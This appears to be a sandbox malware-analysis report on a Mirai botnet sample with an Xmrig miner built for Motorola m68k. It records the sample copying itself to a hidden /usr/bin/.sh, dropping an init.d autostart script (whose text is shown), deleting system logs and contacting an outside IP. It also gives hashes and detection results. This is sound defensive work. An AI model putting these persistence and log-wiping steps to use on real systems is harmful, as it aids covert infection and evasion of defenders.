Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/3873/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/3757/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/10/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/917/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/3758/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/12/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/13/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/14/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/15/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/16/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/17/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/18/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/19/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/1593/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/240/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/120/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/3094/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/121/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/242/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/3406/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/1/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/122/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/243/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/2/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/123/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/244/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/1589/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/3/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/124/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/245/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/1588/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/125/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/4/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/246/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/3402/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/126/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/5/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/247/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/127/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/6/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/248/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/128/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/7/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/249/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/8/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/129/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/800/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/9/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/801/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/803/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/20/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/806/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/21/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/807/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/928/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/23/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/24/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/25/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/26/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/27/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/28/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/29/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/3420/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/490/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/250/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/130/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/251/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/131/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/252/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/132/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/253/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/254/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/255/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/135/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/256/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/1599/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/257/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/378/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/258/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/3412/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/259/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/30/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/35/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/1371/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/260/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/261/cmdline	Jump to behavior

Source: /tmp/morte.m68k.elf (PID: 5817)

Shell command executed: sh -c "cp /tmp/morte.m68k.elf /usr/bin/.sh"

Jump to behavior

Source: /tmp/morte.m68k.elf (PID: 5808)

File: /etc/init.d/sysd (bits: - usr: rx grp: rx all: rwx)

Jump to behavior

Source: /usr/bin/cp (PID: 5822)

File written: /usr/bin/.sh

Jump to dropped file

Source: /tmp/morte.m68k.elf (PID: 5808)

Writes shell script file to disk with an unusual file extension: /etc/init.d/sysd

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes system log files

Source: /tmp/morte.m68k.elf (PID: 5829)	Log files deleted: /var/log/kern.log	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5829)	Log files deleted: /var/log/Xorg.1.log	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5829)	Log files deleted: /var/log/auth.log	Jump to behavior

Drops files in suspicious directories

Source: /tmp/morte.m68k.elf (PID: 5808)	File: /etc/init.d/sysd			Jump to dropped file
Source: /usr/bin/cp (PID: 5822)	File: /usr/bin/.sh			Jump to dropped file

Drops invisible ELF files

Source: /usr/bin/cp (PID: 5822)

ELF file: /usr/bin/.sh

Jump to dropped file

Source: /tmp/morte.m68k.elf (PID: 5804)

Queries kernel information via 'uname':

Jump to behavior

Source: morte.m68k.elf, 5804.1.00007ffc37f17000.00007ffc37f38000.rw-.sdmp, morte.m68k.elf, 5806.1.00007ffc37f17000.00007ffc37f38000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-m68k/tmp/morte.m68k.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/morte.m68k.elf
Source: morte.m68k.elf, 5804.1.00007ffc37f17000.00007ffc37f38000.rw-.sdmp, morte.m68k.elf, 5806.1.00007ffc37f17000.00007ffc37f38000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-m68k
Source: morte.m68k.elf, 5804.1.000056084165b000.00005608416bf000.rw-.sdmp, morte.m68k.elf, 5806.1.000056084165b000.00005608416bf000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/m68k
Source: morte.m68k.elf, 5804.1.000056084165b000.00005608416bf000.rw-.sdmp, morte.m68k.elf, 5806.1.000056084165b000.00005608416bf000.rw-.sdmp	Binary or memory string: V!/etc/qemu-binfmt/m68k

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: morte.m68k.elf, type: SAMPLE
Source: Yara match	File source: 5804.1.00007fc93c001000.00007fc93c01a000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5806.1.00007fc93c001000.00007fc93c01a000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: morte.m68k.elf PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: morte.m68k.elf PID: 5806, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/.sh, type: DROPPED

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: morte.m68k.elf, type: SAMPLE
Source: Yara match	File source: 5804.1.00007fc93c001000.00007fc93c01a000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5806.1.00007fc93c001000.00007fc93c01a000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: morte.m68k.elf PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: morte.m68k.elf PID: 5806, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/.sh, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	2 Scripting	Path Interception	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	Data Obfuscation	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 File and Directory Permissions Modification	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Hidden Files and Directories	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Indicator Removal	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
morte.m68k.elf	50%	Virustotal		Browse
morte.m68k.elf	58%	ReversingLabs	Linux.Worm.Mirai
morte.m68k.elf	100%	Avira	LINUX/Mirai.bonb

Dropped Files

Source	Detection	Scanner	Label	Link
/usr/bin/.sh	100%	Avira	LINUX/Mirai.bonb
/etc/init.d/sysd	0%	Virustotal		Browse
/usr/bin/.sh	58%	ReversingLabs	Linux.Worm.Mirai
/usr/bin/.sh	50%	Virustotal		Browse

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
65.222.202.53	unknown	United States		394096	CAPEREGIONALHEALTHSYSTEMUS	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
65.222.202.53	morte.arm7.elf	Get hash	malicious	Mirai, Xmrig	Browse
	morte.ppc.elf	Get hash	malicious	Mirai, Xmrig	Browse
	morte.sh4.elf	Get hash	malicious	Mirai, Xmrig	Browse
	debug.elf	Get hash	malicious	Mirai, Xmrig	Browse
	morte.arm7.elf	Get hash	malicious	Mirai, Xmrig	Browse
	morte.arm.elf	Get hash	malicious	Mirai, Xmrig	Browse
	morte.arm.elf	Get hash	malicious	Mirai, Xmrig	Browse
	morte.sh4.elf	Get hash	malicious	Mirai, Xmrig	Browse
	morte.mips.elf	Get hash	malicious	Mirai, Xmrig	Browse
	morte.mips.elf	Get hash	malicious	Mirai, Xmrig	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CAPEREGIONALHEALTHSYSTEMUS	morte.arm7.elf	Get hash	malicious	Mirai, Xmrig	Browse	65.222.202.53
	morte.ppc.elf	Get hash	malicious	Mirai, Xmrig	Browse	65.222.202.53
	morte.sh4.elf	Get hash	malicious	Mirai, Xmrig	Browse	65.222.202.53
	debug.elf	Get hash	malicious	Mirai, Xmrig	Browse	65.222.202.53
	morte.arm7.elf	Get hash	malicious	Mirai, Xmrig	Browse	65.222.202.53
	morte.arm.elf	Get hash	malicious	Mirai, Xmrig	Browse	65.222.202.53
	morte.arm.elf	Get hash	malicious	Mirai, Xmrig	Browse	65.222.202.53
	morte.sh4.elf	Get hash	malicious	Mirai, Xmrig	Browse	65.222.202.53
	morte.mips.elf	Get hash	malicious	Mirai, Xmrig	Browse	65.222.202.53
	morte.mips.elf	Get hash	malicious	Mirai, Xmrig	Browse	65.222.202.53

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/sysd	morte.arm7.elf	Get hash	malicious	Mirai, Xmrig	Browse
	morte.arm7.elf	Get hash	malicious	Mirai, Xmrig	Browse
	morte.ppc.elf	Get hash	malicious	Mirai, Xmrig	Browse
	morte.sh4.elf	Get hash	malicious	Mirai, Xmrig	Browse
	debug.elf	Get hash	malicious	Mirai, Xmrig	Browse
	morte.arm7.elf	Get hash	malicious	Mirai, Xmrig	Browse
	morte.arm7.elf	Get hash	malicious	Mirai, Xmrig	Browse
	morte.x86_64.elf	Get hash	malicious	Mirai, Xmrig	Browse
	morte.arm.elf	Get hash	malicious	Mirai, Xmrig	Browse
	morte.arm.elf	Get hash	malicious	Mirai, Xmrig	Browse

Created / dropped Files

/etc/init.d/sysd

Download File

Process:	/tmp/morte.m68k.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	25
Entropy (8bit):	3.5892750707107135
Encrypted:	false
SSDEEP:	3:TKH4v09vzn:hw
MD5:	997CB34FF6E6CDED70B841C0D16C0938
SHA1:	CC85C16E2FB441D86AA668F376CA7FB4B181F1AB
SHA-256:	BA1D50D125344F273C249426CCD744D5A12E560ACE41CCA4BC55BD2D4A718D8F
SHA-512:	1E775CA8513F2841B6A8E369071B28C48489AB6462D06525F9B6B2BF97E9C043562BD7E0217307ED64A95217A76A94A08189616831C9D3127C6B91B7544570C8
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: morte.arm7.elf, Detection: malicious, Browse Filename: morte.arm7.elf, Detection: malicious, Browse Filename: morte.ppc.elf, Detection: malicious, Browse Filename: morte.sh4.elf, Detection: malicious, Browse Filename: debug.elf, Detection: malicious, Browse Filename: morte.arm7.elf, Detection: malicious, Browse Filename: morte.arm7.elf, Detection: malicious, Browse Filename: morte.x86_64.elf, Detection: malicious, Browse Filename: morte.arm.elf, Detection: malicious, Browse Filename: morte.arm.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh./usr/bin/.sh &.

/tmp/qemu-open.eQr1qp (deleted)

Download File

Process:	/tmp/morte.m68k.elf
File Type:	data
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.6841837197791887
Encrypted:	false
SSDEEP:	3:TgnRACdOw5:TgnRARC
MD5:	2DDDAFE67DAC89013EC667D94670D5C6
SHA1:	5EC0B3118235A4AC652DA1DF859F7D3E7E327E03
SHA-256:	8A2ED2EFB48F8A309D99C9F15198C0FB52249098238E5A6CF0AC0EED3B9507D9
SHA-512:	6B63656786D5FAF8C513E3DDF693ADF25F5C043D2F3A0F8797F010DA86270A38EA6C548CE3C1787264268E3D3D22A4A267ECEF4248B6E2A85B14F2E23E6547C6
Malicious:	false
Reputation:	low
Preview:	/tmp/morte.m68k.elf.

/usr/bin/.sh

Download File

Process:	/usr/bin/cp
File Type:	ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
Category:	dropped
Size (bytes):	101752
Entropy (8bit):	6.159504859669253
Encrypted:	false
SSDEEP:	3072:lVxnK69C7HFe9rkP4IgDXTC44/CR8jnbB:JnKl7HU6QXTN4vjbB
MD5:	FD9877FCD67CDA3221F58731BCD32B54
SHA1:	3873A5EEFC7E1BD4438740BBCABD3B12A8615856
SHA-256:	C2F553CBE5BF2DD338B6C9D22ED8E8F1687431FA3404C9E7D2B3DDC46F958797
SHA-512:	0BD7F119F793A53B856D27EBD33BB1D6D2BA4DF05A96425DC5A10217B519DE4DFF2E5F3F8D35CA9E4EC671E32A6BD08194F3FD0E6B546A725BADF470948E5D5A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: /usr/bin/.sh, Author: Joe Security Rule: JoeSecurity_Mirai_3, Description: Yara detected Mirai, Source: /usr/bin/.sh, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 58% Antivirus: Virustotal, Detection: 50%, Browse
Reputation:	low
Preview:	.ELF.......................D...4.........4. ...(.................................. ............................... .dt.Q............................NV..a....da...S8N^NuNV..J9....f>"y...( QJ.g.X.#...(N."y...( QJ.f.A.....J.g.Hy....N.X.........N^NuNV..N^NuNV..A.....J.g.Hy....Hy....N.P.J.... g.A.....J.g.Hy... N.X.N^NuNV..N^Nu.. . OHWHQHy..T.Hy....HP/.Hy..sNN.....J.H.8. o..(/.../..B../..J.o .(..g.C...B.R...g. I.)..\...f.(. D .L...NuNV..H.8 ............E.....N.r...g...J.g.J.....f...#.....`...N.r...g J.f$/...a.....a....\|Hx../.a....XB.a.....B..9....J.o."y.... Q.(..g.X.B.R...g. Y.(..f./...B..././...B.../. PN.O...B.a.....L.....N^NuH.8."o..(/.../..B../..J.g0...)..g.A...B.R...g."H.(..\...f. .g./.a.....(.X. .L...NuH.8."o..(/.../..B../..J.g4...)..g.A...B.R...g "H.(..\...f. .g.Hx../.a....J(.P. .L...NuO...H.?>$o.<$/.@p...d...,..<....g..........g...A... .[.....g...J.g.....g...(.].......(@.......b...G...Hx../.a.....,HP.J.o.A...C.X. ..k....Z.1\|....!P..A.....f. ....(.].J.f...B..0J.g./.a....X.J..0g.

Static File Info

General

File type:	ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.159504859669253
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	morte.m68k.elf
File size:	101'752 bytes
MD5:	fd9877fcd67cda3221f58731bcd32b54
SHA1:	3873a5eefc7e1bd4438740bbcabd3b12a8615856
SHA256:	c2f553cbe5bf2dd338b6c9d22ed8e8f1687431fa3404c9e7d2b3ddc46f958797
SHA512:	0bd7f119f793a53b856d27ebd33bb1d6d2ba4df05a96425dc5a10217b519de4dff2e5f3f8d35ca9e4ec671e32a6bd08194f3fd0e6b546a725badf470948e5d5a
SSDEEP:	3072:lVxnK69C7HFe9rkP4IgDXTC44/CR8jnbB:JnKl7HU6QXTN4vjbB
TLSH:	C1A33ACAF400DDBDF84FDABB4463090AB570E3521A835F376267BE53BD361944922E86
File Content Preview:	.ELF.......................D...4.........4. ...(.................................. ............................... .dt.Q............................NV..a....da...S8N^NuNV..J9....f>"y...( QJ.g.X.#....(N."y...( QJ.f.A.....J.g.Hy....N.X.........N^NuNV..N^NuN

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MC68000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x80000144
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	101352
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x80000094	0x94	0x14	0x0	0x6	AX	2
.text	PROGBITS	0x800000a8	0xa8	0x15362	0x0	0x6	AX	4
.fini	PROGBITS	0x8001540a	0x1540a	0xe	0x0	0x6	AX	2
.rodata	PROGBITS	0x80015418	0x15418	0x32f1	0x0	0x2	A	2
.ctors	PROGBITS	0x8001a710	0x18710	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x8001a718	0x18718	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x8001a724	0x18724	0x484	0x0	0x3	WA	4
.bss	NOBITS	0x8001aba8	0x18ba8	0xa318	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x18ba8	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x80000000	0x80000000	0x18709	0x18709	6.1858	0x5	R E	0x2000	.init .text .fini .rodata
LOAD	0x18710	0x8001a710	0x8001a710	0x498	0xa7b0	3.3589	0x6	RW	0x2000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 6, 2025 08:13:08.163383961 CEST	37518	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:13:09.175633907 CEST	37518	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:13:11.191521883 CEST	37518	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:13:15.383251905 CEST	37518	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:13:21.736421108 CEST	37520	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:13:22.742986917 CEST	37520	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:13:24.759057999 CEST	37520	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:13:28.950891972 CEST	37520	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:13:35.822384119 CEST	37522	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:13:36.854379892 CEST	37522	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:13:38.870383978 CEST	37522	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:13:43.030230999 CEST	37522	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:13:49.557105064 CEST	37524	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:13:50.582061052 CEST	37524	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:13:52.597839117 CEST	37524	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:13:56.853718996 CEST	37524	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:03.148118019 CEST	37526	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:04.149282932 CEST	37526	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:06.165215969 CEST	37526	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:10.421106100 CEST	37526	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:16.817308903 CEST	37528	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:17.844773054 CEST	37528	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:19.860723972 CEST	37528	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:23.988642931 CEST	37528	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:30.201353073 CEST	37530	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:31.220314980 CEST	37530	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:33.236224890 CEST	37530	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:37.300105095 CEST	37530	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:43.599756002 CEST	37532	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:44.627672911 CEST	37532	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:46.643606901 CEST	37532	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:50.867528915 CEST	37532	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:57.014460087 CEST	37534	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:14:58.035147905 CEST	37534	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:15:00.051094055 CEST	37534	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:15:04.178870916 CEST	37534	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:15:10.392350912 CEST	37536	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:15:11.410621881 CEST	37536	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:15:13.426512957 CEST	37536	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:15:17.490370035 CEST	37536	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:15:24.501507044 CEST	37538	80	192.168.2.14	65.222.202.53
Jul 6, 2025 08:15:25.522176981 CEST	37538	80	192.168.2.14	65.222.202.53

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 6, 2025 08:13:07.730364084 CEST	45189	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:07.816135883 CEST	53	45189	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:07.817270041 CEST	32786	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:07.902853012 CEST	53	32786	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:07.903826952 CEST	52461	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:07.989547968 CEST	53	52461	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:07.990580082 CEST	57328	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:08.076251030 CEST	53	57328	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:08.077269077 CEST	55023	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:08.162771940 CEST	53	55023	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:21.301404953 CEST	50563	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:21.387223005 CEST	53	50563	8.8.8.8	192.168.2.14
